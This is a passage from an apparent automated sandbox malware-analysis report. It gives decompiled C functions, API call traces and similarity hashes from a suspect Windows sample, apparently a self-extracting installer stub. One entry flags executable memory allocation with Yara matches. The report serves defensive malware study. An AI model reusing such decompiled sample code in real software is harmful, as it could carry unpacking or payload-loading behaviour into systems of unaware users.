			E0040487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E0040490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

0x00404880
0x0040488c
0x00404894
0x004048a0
0x004048c9
0x004048ce
0x004048a2
0x004048a8
0x004048b7
0x004048bc
0x004048aa
0x004048ac
0x004048ac
0x004048a8
0x004048de
0x004048e7
0x0040490b
0x004048ee
0x004048f0
0x00000000
0x00404902

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00404A23,?,00404F67,*MEMCAB,00008000,00000180), ref: 004048DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00404F67,*MEMCAB,00008000,00000180), ref: 00404902

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: fadf226ed69bbb41dbb50a9d93363128b59b8e1147c1ebbdb1745835005b5b17
Instruction ID: dce78edff5e7a467645b78d59c04aaa4689d7eeda0cc1ba10610c6ef675d671e
Opcode Fuzzy Hash: fadf226ed69bbb41dbb50a9d93363128b59b8e1147c1ebbdb1745835005b5b17
Instruction Fuzzy Hash: B00128E7E116702AF22450294C88FB7551C8BD6634F1A4736BEAABA2D2D5784C0481E8

Uniqueness

Uniqueness Score: -1.00%

Function 00404AD0 Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x40858c; // 0x158
				_t9 = E00403680(_t20);
				if( *0x4091d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x408d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x409400; // 0x10d200
							_t15 = _t14 + _t25;
							 *0x409400 = _t15;
							if( *0x408184 != 0) {
								_t21 =  *0x408584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x4093f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x00404ad5
0x00404adb
0x00404ae7
0x00404aee
0x00404b05
0x00404b0d
0x00404b14
0x00404b1a
0x00404b1c
0x00404b21
0x00404b2a
0x00404b2f
0x00404b31
0x00404b39
0x00404b54
0x00404b54
0x00404b39
0x00404b2f
0x00404b0f
0x00404b0f
0x00404b0f
0x00404b5e
0x00404ae9
0x00404aed
0x00404aed

APIs

Part of subcall function 00403680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0040369F
Part of subcall function 00403680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004036B2
Part of subcall function 00403680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004036DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00404B05

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: ab6259a8a4d2dd022a3c8d33f5e1e8a15f83e3210f04ee4509b3a011844fb6d6
Instruction ID: 7cceea35d73159b26d1b83d1328ee4e94251b7085b3a179f835f58e33a962e09
Opcode Fuzzy Hash: ab6259a8a4d2dd022a3c8d33f5e1e8a15f83e3210f04ee4509b3a011844fb6d6
Instruction Fuzzy Hash: 74018071200205ABDB149F59DE05BA27769AB84725F04823AFA39BB2E1CB74DC11CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040658A Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x408b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x408b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E004016B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}

0x00406592
0x00406594
0x00406596
0x00406598
0x00406598
0x0040659b
0x0040659b
0x0040659d
0x0040659e
0x004065a2
0x004065a4
0x004065a9
0x004065b2
0x004065b6
0x004065ba
0x004065c3
0x004065c5
0x004065c8
0x004065c8
0x004065c3
0x004065c9
0x004065cc
0x004065d2
0x004065d1
0x004065d1
0x00000000
0x004065dc
0x00000000

APIs

CharPrevA.USER32(00408B3E,00408B3F,00000001,00408B3E,-00000003,?,004060EC,00401140,?), ref: 004065BA

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: b08d9a994ba15229853f1fb0455e3b44e106027da8ecf514dd4033e1e77c22ce
Instruction ID: 40dc54a50ef1d9b939454141e84776cfaea9ff212e965cea6d62fa9ba78ea7d4
Opcode Fuzzy Hash: b08d9a994ba15229853f1fb0455e3b44e106027da8ecf514dd4033e1e77c22ce
Instruction Fuzzy Hash: B3F02D32104250BFD3314919BC84B67BFDD9B86350F16017FE8DBA3385CA7D4D5682A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040621E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x408004; // 0xee8c6708
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E0040597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E004044B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x409124 = E00406285();
					_t9 = 0;
				}
				return E00406CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x00406229
0x00406230
0x00406247
0x0040626a
0x00406272
0x00406249
0x00406255
0x0040625f
0x00406264
0x00406264
0x00406284

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040623F

Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554

Part of subcall function 00406285: GetLastError.KERNEL32(00405BBC), ref: 00406285

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: 3325270bcf1ca384f477d4cfa035b617f289eb05c34c13c48fc71639da7fe5a9
Instruction ID: c9fc7c92a7cec4c9f4a35bfa16e57d250416f75581f2c593a26caa7fdf97897f
Opcode Fuzzy Hash: 3325270bcf1ca384f477d4cfa035b617f289eb05c34c13c48fc71639da7fe5a9
Instruction Fuzzy Hash: 49F0B4B07042086BE750FB758E02FBA32A8DB44304F4100BFBA86F61D1DD789D648658

Uniqueness

Uniqueness Score: -1.00%

Function 00404B60 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x408d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0x408d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x408d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x408d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x408d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x408d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x408d6c)) = 0;
				return 0;
			}

0x00404b66
0x00404b74
0x00404b98
0x00404ba0
0x00000000
0x00404bac
0x00404ba4
0x00000000
0x00404ba4
0x00404b78
0x00404b7e
0x00404b84
0x00404b8a
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00404FA1,00000000), ref: 00404B98

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 81f8c292e8a167303dab4fee7506f6ace6dbeb9d23bbb5b0b049432824c4c0aa
Instruction ID: b92c02e1d42775b4d64c1b480fc1218859da62ddf6c23338d971301b0ff3d73c
Opcode Fuzzy Hash: 81f8c292e8a167303dab4fee7506f6ace6dbeb9d23bbb5b0b049432824c4c0aa
Instruction Fuzzy Hash: F4F0FE71500B089EC7618E398E00653BBE4AED53603100A3F95EEF21D0EB34A871DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004066AE Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004066AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}

0x004066b1
0x004066ba
0x004066c7
0x004066bc
0x004066be
0x004066be

APIs

GetFileAttributesA.KERNELBASE(?,00404777,?,00404E38,?), ref: 004066B1

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c7a10a2f911a57d7b615a8355233fd4650d5e9e4080771bf9336d98f7453a15a
Instruction ID: b0bf721a4a9401975da429cbe36b66188ee692fd53fb4aa260148cb1fc4dfac4
Opcode Fuzzy Hash: c7a10a2f911a57d7b615a8355233fd4650d5e9e4080771bf9336d98f7453a15a
Instruction Fuzzy Hash: D0B0927662254442AA200A316C2995A2845A6C123A7E52BA1F033E02E0CA3EC8A6D008

Uniqueness

Uniqueness Score: -1.00%

Function 06880485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 068804D6

Memory Dump Source

Source File: 00000000.00000002.341440182.0000000006880000.00000040.00000020.00020000.00000000.sdmp, Offset: 06880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6880000_SzznpUhIjo.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: e35c97a6d6f9ad121351f9e8045c2fe3359cbc86be93660b4129a76b70f917f2
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 3D113C79A00208EFDB41DF98C985E9DBBF5AF08351F158094F948AB361D375EA90DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00404CA0 Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}

0x00404caa
0x00404cb1

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 00404CAA

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: e8dfc452646d7158c2cb1bd13dfe0e4dba9c7bd9453fa8bfc8256f8e446bf251
Instruction ID: 9573c9426388a2d7b89283d718c50bbdfd09632f04378d08ec902689231ba7f3
Opcode Fuzzy Hash: e8dfc452646d7158c2cb1bd13dfe0e4dba9c7bd9453fa8bfc8256f8e446bf251
Instruction Fuzzy Hash: 83B0123204430CB7CF001FC2EC09F853F1DE7C4761F140010FA0C450508A729420869B

Uniqueness

Uniqueness Score: -1.00%

Function 00404CC0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}

0x00404cc8
0x00404ccf

APIs

GlobalFree.KERNEL32 ref: 00404CC8

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 6fe7bbbb28cd53af7a797c03c8a38af0ffb6b325bfffe95d671f986cc4886e11
Instruction ID: 12c573750d921541fd6cb29f5945249fc66636a9552ad745523379c0a512c5ca
Opcode Fuzzy Hash: 6fe7bbbb28cd53af7a797c03c8a38af0ffb6b325bfffe95d671f986cc4886e11
Instruction Fuzzy Hash: 52B0123100020CB7CF001F42ED088453F1DD6C02607000020F90C410218B339821858A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00405C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x408004; // 0xee8c6708
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00406CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00406E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x408004; // 0xee8c6708
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E0040597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E004044B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x409124 = E00406285();
									_t75 = 0;
								}
								return E00406CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E004044B9(0, 0x521, 0x401140, 0, 0x40, 0);
												_t85 =  *0x408588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E0040667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E0040667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00405C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00401680(0x408c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E0040667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E0040667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x408a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00405C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x408b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x408a3a;
																}
																E00401680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0040658A(_t218, 0x104, 0x401140);
																if(E004031E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x408a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x408a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x408a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x408a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x408a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x409a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x409a2c =  *0x409a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x408d48 =  *0x408d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x409a2c =  *0x409a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x409a2c =  *0x409a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x408d48 =  *0x408d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x409a2c =  *0x409a2c | 0x00000004;
																										L70:
																										 *0x408a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x409a2c = 3;
																	 *0x408a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x408a2c != 0 &&  *0x408b3e == 0) {
						if(GetModuleFileNameA( *0x409a3c, 0x408b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E004066C8(0x408b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}

0x00405c9e
0x00405ca9
0x00405cb0
0x00405cb3
0x00405cb6
0x00405cb7
0x00405cb8
0x00405cbd
0x00406204
0x00405ccb
0x00000000
0x00405ccb
0x00405cd3
0x00405cd7
0x00405cf4
0x00000000
0x00405cf4
0x00405cf8
0x00405d00
0x00000000
0x00405d06
0x00405d06
0x00405d0e
0x00405d10
0x00405d12
0x00405d14
0x00405d15
0x00405d17
0x00405d49
0x00000000
0x00000000
0x00000000
0x00000000
0x00405d19
0x00405d19
0x00405d1d
0x00000000
0x00405d3f
0x00405d3f
0x00405d4b
0x00405d4b
0x00405d4f
0x00405d8d
0x00000000
0x00405d93
0x00405d93
0x00405d9a
0x00405d9d
0x00405d9e
0x00000000
0x00405d9e
0x00405d51
0x00405d5b
0x00405d72
0x004060fb
0x004060fb
0x00406207
0x0040620a
0x0040620b
0x0040620e
0x00406217
0x00405d78
0x00405d78
0x00405d80
0x00405d83
0x00405d84
0x00000000
0x00405d84
0x00405d5d
0x00405d5f
0x00405d62
0x00405d68
0x00405d64
0x00405d64
0x00405d64
0x00000000
0x00405d62
0x00405d5b
0x00405d4f
0x00405d1d
0x00000000
0x00405d9f
0x00405d9f
0x00405da5
0x00405dab
0x00405dba
0x00406218
0x0040621d
0x00406220
0x00406221
0x00406229
0x00406230
0x00406247
0x0040626a
0x00406272
0x00406249
0x00406255
0x0040625f
0x00406264
0x00406264
0x00406284
0x00405dc0
0x00405dc0
0x00405dca
0x00405e22
0x00000000
0x00000000
0x00000000
0x00000000
0x00405dcc
0x00405dce
0x00405e24
0x00405e24
0x00405e2c
0x00405e47
0x00405e4a
0x004061d2
0x004061e2
0x004061e7
0x004061ee
0x004061f1
0x004061f1
0x004061f8
0x004061f8
0x00405e50
0x00405e53
0x00406109
0x0040611f
0x00000000
0x00406125
0x00406137
0x0040613a
0x0040613c
0x0040613e
0x0040613e
0x00406141
0x00406141
0x00406143
0x00406144
0x0040614a
0x00000000
0x00406150
0x00406152
0x0040615c
0x00406170
0x00406172
0x0040617c
0x00406190
0x00406190
0x00406196
0x004061a5
0x00000000
0x004061ab
0x004061b9
0x004061c6
0x004061c6
0x0040617e
0x00406180
0x0040618a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040618a
0x0040615e
0x00406160
0x0040616a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040616a
0x0040615c
0x0040614a
0x0040610b
0x0040610e
0x0040610e
0x00000000
0x00405e59
0x00405e59
0x00405e5c
0x0040604f
0x00406056
0x00000000
0x0040605c
0x0040606e
0x00406071
0x00406073
0x00406075
0x00406075
0x00406078
0x00406078
0x0040607a
0x0040607b
0x00406081
0x00000000
0x00406087
0x00406087
0x0040608d
0x0040609c
0x00000000
0x004060a2
0x004060aa
0x004060b2
0x004060b7
0x004060bd
0x004060bf
0x004060bf
0x004060d6
0x004060e0
0x004060e7
0x004060f5
0x00000000
0x00000000
0x00000000
0x00000000
0x004060f5
0x0040609c
0x00406081
0x00405e62
0x00405e62
0x00405e65
0x00405fd3
0x00405fe9
0x00000000
0x00405fef
0x00405fef
